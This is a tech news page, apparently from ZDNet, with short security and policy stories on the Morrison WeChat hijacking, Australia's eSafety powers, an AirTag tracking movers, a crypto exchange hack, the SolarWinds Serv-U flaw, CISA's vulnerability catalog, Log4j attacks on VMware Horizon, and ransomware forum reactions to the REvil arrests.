More stories

  • in

    China accused of hijacking Australia Prime Minister Scott Morrison's WeChat account

    Image: Getty Images
    A Liberal member of parliament has accused the Chinese government of foreign interference after Prime Minister Scott Morrison’s account on WeChat was hijacked. “It is a matter of record that the platform has stopped the Prime Minister’s access, while Anthony Albanese’s account is still active featuring posts criticising the government,” Liberal representative Gladys Liu said. “In an election year especially, this sort of interference in our political processes is unacceptable, and this matter should be taken extremely seriously by all Australian politicians.” As part of the accusations against the Chinese government, Liu said she would boycott using her official and personal WeChat accounts until an explanation was provided by the platform about the incident. Various Coalition members have also backed Liu’s accusations and boycott, with Parliamentary Joint Committee on Intelligence and Security chair and Liberal Senator James Paterson calling for Opposition Leader Anthony Albanese to follow suit in boycotting WeChat. Stuart Robert, the Minister responsible for digital transformation, told The Today Show on Monday morning that the Prime Minister’s office was seeking to contact the Chinese government about the account hijacking. “It is odd, and of course, the Prime Minister’s office is seeking to connect through to them to work out and get it resolved,” Robert said.  

    First reported by NewsCorp Australia, the WeChat account was reportedly renamed and Morrison faced accessibility problems months ago, with the Prime Minister now unable to access the account at all. According to Australian Strategic Policy Institute senior analyst Fergus Ryan, Morrison’s account is registered to a Chinese national as WeChat’s policies at the time required for accounts to either be linked to the ID of a Chinese national or business registered in China. In China, WeChat has faced growing regulation, having been put on notice last year for collecting more user data than deemed necessary when offering services. Tencent, the company running WeChat, last year also implemented further restrictions for how much minors could play its flagship game Honour of Kings as part of efforts to appease government concerns. In that restriction, Honour of Kings gamers under the age of 18 are limited to playing time of one hour on regular days and two hours on public holidays.Related Coverage More

  • in

    Inman Grant's reappointment as eSafety commissioner comes with new powers

    Image: Getty Images
    The federal government has reappointed Julie Inman Grant as the country’s eSafety commissioner. The reappointment comes simultaneously with the Online Safety Act, which passed last year, officially coming into effect. “The Online Safety Act commences operation [on Sunday] and Ms Inman Grant’s reappointment provides certainty, particularly to community organisations and industry who have been working with the office of the eSafety Commissioner for some time,” said Paul Fletcher, the Minister for Communications, Urban Infrastructure, Cities and the Arts. Inman Grant was first put into the role in 2016, months after the Office of the eSafety Commissioner was established under the Australian Communications and Media Authority (ACMA). During her tenure, the eSafety commissioner has steadily expanded from initially only protecting children to a remit of providing supporting mechanisms for all Australians online. With the Online Safety Act now in effect, Inman Grant has even more substantial powers, such as being able to order social media platforms and other websites popular among children to remove cyberbullying content within 24 hours.If these entities fail to remove the content, the commissioner can issue fines of up to 500 penalty units, which equates to a maximum of AU$111,000 for individuals and AU$555,000 for companies. While Inman Grant could already order the removal of cyberbullying content aimed at children, the key change to the commissioner’s powers is that she can also issue orders for cyberbullying content targeted at adults too. In addition, the time allowed for online service providers to take down this type of content has also been cut in half, from 48 hours to 24 hours.

    Beyond being able to order the removal of cyberbullying content, the eSafety commissioner can also order the takedown of intimate images of someone that was shared without their consent, abhorrent violent material, as well as restricted online content.Online safety has been high on the federal government’s agenda as late, with initiatives such as the Online Safety Youth Advisory Council, the proposal of anti-trolling and online privacy laws, and a federal probe into practices of major technology companies all coming in the past few months.RELATED COVERAGE More

  • in

    She didn't trust her movers. A single Apple AirTag proved she was right

    C. Osborne | ZDNet
    Apple’s AirTags are getting some of a bad (brand) name.It’s “a perfect tool for stalking,” as Eva Galperin, Director of Cyber-Security at the Electronic Frontier Foundation, put it to the BBC.

    She’s right, of course.That’s the problem with technology, isn’t it? For every potential good use, there are at least several pain-inducing, criminal-pleasing, world-ending uses. Too often, the bad outweighs the good, especially in the public eyes and ears.Here, though, is a tale of a woman who’s glad she used an AirTag for her own surveillance purposes.Valerie McNulty has moved around a few times. She’s an army spouse and she knows the drill.As she told the Military Times, McNulty also knows that moving companies aren’t universally reliable. It’s not just that they can break things or lose things. It’s that, well, they may not always deliver the facts in a way that’s actually factual.

    So McNulty slid an AirTag into one of her family’s moving boxes containing her son’s toys. They had a long way to go, from Fort Carson, Colorado to Fort Drum, New York.You’ll be stunned when I tell you the boxes didn’t turn up on time. They were a month late. A promise of a Friday delivery became the promise of a Sunday delivery. You know how these things go. Also: How tech is a weapon in modern domestic abuse — and how to protect yourselfThe driver finally called McNulty and told her that he was just picking up her family’s boxes in Colorado.The call didn’t go well. You see, McNulty had already checked the location of her AirTag. She knew it was in Elizabeth, New Jersey, not far from her new home.”I made him aware that I knew he was only four hours away from us,” she told the Military Times. “He called back several minutes later trying to bargain with me to see if he could deliver it on Sunday or Monday.””Where was the driver?,” you might ask. Allegedly seeing a lady friend, said McNulty.And, of course, all of her family’s boxes didn’t arrive. You can completely understand why McNulty used the AirTag in the way she did. This whole tale makes me wonder, though, what we’ve come to and where we’re going.Employers don’t trust remote employees, for example, so they garland them with surveillance technology.Too many humans don’t like or trust each other. So they use technology to abuse each other, stalk each other, hack each other, and even break into their lovers’ gadgets.At the same time, they use technology to stay in touch with each other and work together in ways that were never previously possible.Perhaps we were always as two-sided as this.Ultimately, though, because of the immediacy and ubiquity of technology, the result is an exponentially heightened collective paranoia. If our default is that we can trust no one and fear everyone, how can we ever really get along?How can we ever be at peace?

    more Technically Incorrect More

  • in CEO responds to complaints of login issues after $31 million hack CEO Kris Marszalek responded to complaints from thousands of users about issues logging back into their accounts after the company was forced to change security settings following a hack last week. On Monday, the company admitted that 483 users were affected by unauthorized cryptocurrency withdrawals on their accounts, costing a total of “4,836.26 ETH, 443.93 BTC, and approximately US$66,200 in other cryptocurrencies.” At the time of the attack, that amounted to about $31 million. said in a statement that it revoked all customer 2FA tokens and “added additional security hardening measures, which required all customers to re-login and set up their 2FA token to ensure only authorized activity would occur.”But thousands of people took to social media since then to complain that they could not get back into their accounts. Hundreds of people tweeted at begging for help, complaining that support channels were not working. When pressed for comment, directed ZDNet to a statement from Marszalek that was posted to Twitter on Friday evening. “If you can’t get back into our app following access reset this week, in 95/100 cases you are simply using the wrong email to login. We don’t allow duplicate accounts with the same phone number, so you will get stuck if you are using the wrong email,” Marszalek wrote. He urged customers to check their inboxes for emails from and said the “one which has it is the one you should use to login into the app.” 

    “If you can’t find it, or no longer have access to it, please reach out to our CS. We will authenticate you again. We are helping users with these cases one by one, but it takes time given the scale of our platform. Our team is also working on a new app release that specifically communities this via UI/UX improvements,” he explained. “Finally, rest assured your funds are safe and waiting for you to log back in.. with the right email.”The statement did little to assuage angry customers demanding access to their accounts. The company initially denied reports that funds were stolen, even as PeckShield said around $15 million was being washed through a coin tumbler. By Wednesday, Marszalek was forced to appear on Bloomberg to confirm that about 400 users had been attacked and users’ ability to withdraw funds was paused. created a program designed to refund users who were affected by the hack with up to $250,000. The company said terms and conditions “may vary by market according to local regulations” and that “ will make the final determination of eligibility requirements and approval of claims.” More

  • in

    Log4J: Microsoft discovers attackers targeting undisclosed SolarWinds vulnerability

    Microsoft researchers have discovered a previously undisclosed vulnerability in the SolarWinds Serv-U software while monitoring threats related to Log4J vulnerabilities. Jonathan Bar Or explained on Twitter that while he was hunting for a Log4J exploit attempt, he noticed attacks coming from serv-u.exe. 

    more Log4j

    “Taking a closer looked revealed you could feed Ssrv-U with data and it’ll build a LDAP query with your unsanitized input! This could be used for log4j attack attempts, but also for LDAP injection,” he wrote. “Solarwinds immediately responded, investigated and fixed the #vulnerability. Their response is the quickest I’ve seen, really amazing work on their part!”Microsoft later released a blog about the issue, tracked as as CVE-2021-35247, and said it is an “input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.”In their advisory, SolarWinds said the Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized.”SolarWinds has updated the input mechanism to perform additional validation and sanitization. No downstream affect has been detected as the LDAP servers ignored improper characters,” the company said, adding that it affects 15.2.5 and previous versions. 

    NTT Application Security’s Ray Kelly told ZDNet that the vulnerability surprised and concerned him considering SolarWinds is fresh on the heels of their previous breach that affected thousands of customers. “Given that the Log4j disclosure was published in December, this Open Source vulnerability should have been of the utmost priority for SolarWinds. While it appears that SolarWinds was not susceptible to have the vulnerable component exploited, it’s still not something want in your software product,” Kelly said. “Most all application security products can detect the Log4j vulnerability giving developers the ability to quickly identify and fix issue.” Microsoft urged customers to apply the security updates explained in the SolarWinds advisory and said customers can use their tools to identify and remediate devices that have the vulnerability. Microsoft Defender Antivirus and Microsoft Defender for Endpoint also detect behavior related to the activity, they added. Netenrich’s John Bambenek added that Microsoft’s warning and SolarWinds’ quick response time represented a positive example of how vulnerabilities need to be dealt with.  “This is the kind of vulnerability and research cooperation we need, where a major tech company with visibility to see the attacks reaches out to the software company and a fix is rushed to production,” Bambenek said.  More

  • in

    CISA adds 13 exploited vulnerabilities to list, 9 with Feb. 1 remediation date

    CISA released its latest update to the Known Exploited Vulnerabilities catalog, adding 13 new vulnerabilities. Nine of the vulnerabilities have a remediation date of February 1 and four of them have a remediation date of July 18. The list includes an October CMS Improper Authentication, a System Information Library for node.js Command Injection vulnerability, an Oracle Corporate Business Intelligence Enterprise Edition Path Traversal vulnerability, an Apache Airflow Experimental API Authentication Bypass vulnerability, a Drupal Core Unrestricted Upload of File vulnerability, and three Nagios XI OS Command Injection vulnerabilities.
    The October CMS Improper Authentication — CVE-2021-32648 — was allegedly used during a cyberattack on Ukrainian government systems last week. A patch was released in September 2021. The Media Trust CEO Chris Olson said the vulnerability’s alleged use in the recent attack on Ukraine explains the software’s inclusion on the list but he noted that its inclusion highlights “an alarming growth in web-based cyberattacks and the role they will play in global cyber warfare.” “Little attention is paid to the Web as an attack surface. While organizations across the public and private sector are increasingly aware of cyber risk, the stack of third-party code used in Web development rarely meets the standards for AppSec that those organizations would demand from any of their IT systems,” Olson said. Jordan LaRose, director of incident response at F-Secure, told ZDNet that CISA’s guidance matches much of what they are seeing in the wild from a malicious actor standpoint. LaRose said that what stood out most to him was that these are all vulnerabilities affecting web servers or APIs. This is a trend LaRose said he has seen develop significantly in the past year among malicious actors, many of whom are turning to more than just classical methods like phishing or trojans to gain footholds in organizations with strong security postures. 

    “What we’re seeing now is a wave of attacks where attackers are targeting technology rather than people, with the most recent notable example being the Log4Shell attacks. These attacks are largely done opportunistically, with attackers loading up scanning scripts with the exploits and hitting everything they can on the internet to find a potential victim,” he said. Neosec vice president Edward Roberts echoed that sentiment, adding that the volume of vulnerabilities involving APIs will continue to increase because there are more APIs being developed each day. Most organizations, he said, “don’t even know how many APIs they have, let alone which ones have vulnerabilities, let alone consider how they are being defrauded by abusive behavior.”A number of cybersecurity experts noted that several of these vulnerabilities were identified months ago. Some of the vulnerabilities on the list date back to 2012 and 2013 according to Netenrich principal threat hunter John Bambenek, who expressed concerns about the fact that they haven’t already been patched.  “That the agency doesn’t have basic patch deployment information from other units of government implies there is no central management of that information. The posture of federal IT cybersecurity seems to have remained stalled at square one,” Bambenek said. “If an exploited vulnerability can be used to execute commands on the victim machine, then CISA sets a two week due date to patch. That being said, two weeks is far too slow. The exchange vulnerability concerns me the most, however, some of this stuff is quite off the beaten path. But, this may be common in government installations so worthy to put on the list.”Vulcan Cyber CPO Tal Morgenstern noted that seven of the vulnerabilities with remediation dates of February 1 relate to systems management tools.”Systems management tools from VMware, Nagios, F5, Npm and more hold the keys to the kingdom giving the user substantial power to automate system change for good or bad. This isn’t a new concern as we’ve seen an unfortunate trend of vulnerabilities in systems management software tools this year,” Morgenstern explained. “Considering the amount of access and control these tools have, IT security teams must take immediate steps to fully mitigate known risks. Don’t wait for February. Move now.” More

  • in

    Log4J: Attackers continue targeting VMware Horizon servers

    According to several cybersecurity companies monitoring the situation, attackers are still targeting VMware Horizon servers through Log4J vulnerabilities. 

    More VMWare

    Two weeks ago, the UK’s National Health Service (NHS) issued a warning that an ‘unknown threat group’ is attempting to exploit a Log4j vulnerability (CVE-2021-44228) in VMware Horizon servers to establish web shells that could be used to distribute malware and ransomware, steal sensitive information, and complete other malicious attacks. Since then, several cybersecurity companies have confirmed that hackers are continuing to target VMware Horizon servers. In a statement to ZDNet, VMware said they are continuing to urge customers to apply the latest guidance found in their security advisory, VMSA-2021-0028, in order to resolve vulnerabilities CVE-2021-44228 and CVE-2021-4504. “We also recommend that customers visit our corresponding Questions & Answers document for the latest information and join the VMware Security-Announce mailing list for all future advisories. Any service connected to the internet and not yet patched for Log4j vulnerabilities CVE-2021-44228 and CVE-2021-4504 is vulnerable to hackers, and VMware strongly recommends patching,” a VMware spokesperson said. Rapid7 said it began monitoring a sudden increase in VMware Horizon exploitation on January 14 and identified five unique avenues that attackers have taken post-exploitation, signaling that multiple actors are involved in this mass exploitation activity.”The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system,” Rapid7 explained.Huntress released its own blog about the issue, noting that according to Shodan, about 25,000 Horizon servers are currently internet-accessible worldwide.

    Roger Koehler, vice president of threat operations at Huntress, told ZDNet the NHS article didn’t give an idea of the scope of the problem. “Based on how many Horizon servers in our data set are unpatched (only 18% were patched as of last Friday night), there is a high risk of this seriously impacting hundreds-if not in the low thousands-of businesses. This weekend also marks the first time we’ve seen proof of widespread escalation, going from gaining initial access to starting to take hostile actions on Horizon servers,” Koehler said. “Since we’re seeing multiple likely unrelated campaigns (cryptominers, web shells, Cobalt Strike), it’s likely that this will continue to escalate. Attackers are going to make businesses pay for not fully patching when VMware gave their initial guidance. Although the initial web shell campaign appears to focus on long-term access, it’s likely that future activity will focus on targeting or impacting the systems accessible via VMware Horizon. And it makes sense-attackers can use this access to impact all the virtualized hosts and servers.” Koehler added that these are high-value targets, and people are not patching despite multiple, widespread campaigns targeting them, noting that they recently witnessed this happen with ProxyShell and ProxyLogon. While these are not quite as significant and far-reaching as this latest cyberattack, these vulnerabilities serve as evidence that attackers will likely be back to target those systems that haven’t yet been patched, Koehler explained. He said ProxyShell surfaced months after ProxyLogon was disclosed, and it was made possible only because many had failed to properly patch. “The timing is also significant. If we think back to the big Kaseya incident, they picked the July 4 holiday weekend. The original widespread intrusion with web shells took place over the Christmas holiday (they were dropped between December 25 and December 29), and things are escalating now that it’s another three-day weekend in the US. Is damage control going to become a holiday tradition for those in cybersecurity?” Koehler said.”The web shell attack between December 25 and 29 was more sophisticated compared to something like the Exchange attack. It seems like the majority of antivirus tools failed to identify that anything was wrong and still haven’t caught up. The moral of this story? It’s the same old song: patch, patch, patch.” More

  • in

    After ransomware arrests, some dark web criminals are getting worried

    Cyber criminals are becoming anxious about being tracked down by law enforcement agencies following the high-profile arrests of suspected members of one of the most notorious ransomware groups.  On January 14, Russia’s Federal Security Service (FSB) announced it had detained members of the REvil ransomware gang operating from several regions of the country and dismantled the group’s operations. Previous action by Europol resulted in the arrest of a suspected REvil affiliate near the Polish and Ukranian border. 

    ZDNet Recommends

    According to analysis of chatter on Dark Web forums by cybersecurity researchers at Trustwave SpiderLabs, the recent arrests, particularly those by Russia, appear to have scared cyber criminals, some of whom appear to be worried that they might be next.  SEE: A winning strategy for cybersecurity (ZDNet special report) Ransomware is one of the biggest cybersecurity issues facing organisations and the wider world today, with a string of incidents demonstrating how such attacks can impact utilities, healthcare, food production and other vital services that people need everyday, while cyber criminals can walk away with huge sums of money when victims give in and pay the ransoms required for a decryption key.    There’s a consensus among cybersecurity experts that many of the major ransomware operations work out of Russia, with the authorities willing to turn a blind eye towards attacks targeting the West. But following arrests throughout the region, some cyber criminals are wondering if the risk is worth it.  “This is a big change. I have no desire to go to jail,” wrote one forum member. 

    “In fact, one thing is clear, those who expect that the state would protect them will be greatly disappointed,” said another.  There’s even concern that administrators of the dark web communities – who would have details about their users – could be coerced into working for law enforcement following arrest.  Such is the paranoia among some forum members and ransomware affiliates that they suggest moving operations to a different jurisdiction, although this is unlikely to be a realistic option for many.  “Those that are seasoned in cybercrime understand that by moving outside of Russia, they’ll be taking on an even greater risk of being arrested by international law enforcement agencies. These agencies that are keeping tabs on cyber criminals will be watching for such potential moves,” Ziv Mador, VP security research at Trustwave SpiderLabs, told ZDNet.  “Also, there is a large talent pool in Russia already, so more members and affiliates can always be recruited. Recruiting can become more difficult in other geographies. There is a level of trust that is required, and that trust diminishes the further away a prospective member is from ‘home base’,” he added.  SEE: My stolen credit card details were used 4,500 miles away. I tried to find out how it happened  However, while some users are anxious following the arrests, some are less sympathetic, blaming a string of high-profile attacks against major targets in the United States for the unwelcome attention. “It was necessary to think before climbing and encrypting multi-billion-dollar companies, schools, states. With whom did they dare to compete?” one user wrote.  “They climbed everywhere indiscriminately without understanding which country [they were attacking],” said another.  “Some cyber criminals may feel like REvil spoiled the ability to earn a living by attracting too much law enforcement attention and political powers. This kind of activity may have triggered a lack of sympathy by forum members,” said Mador.